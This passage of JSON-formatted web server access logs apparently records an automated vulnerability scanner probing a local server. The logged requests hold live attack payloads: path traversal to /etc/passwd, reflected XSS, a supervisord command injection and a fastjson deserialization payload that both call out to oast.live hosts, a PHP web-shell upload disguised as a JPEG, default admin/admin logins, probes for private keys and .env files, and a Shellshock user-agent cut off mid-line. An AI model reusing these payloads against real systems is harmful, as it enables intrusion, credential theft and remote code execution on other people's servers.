"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9oms3gsmpve1ijt0mc09gixm6zi1ucuf.oast.live\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.762","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc0h8fy9k96i7xa5.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.411","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.411","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.474","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.707","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.491","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.825","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.363","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.651","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x2228fHqSJ0xGhgXPEt86cnS3E4dh5.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.599","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.430","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.443","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.846","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.344","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.263","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.579","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.810","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /time.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.374","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat 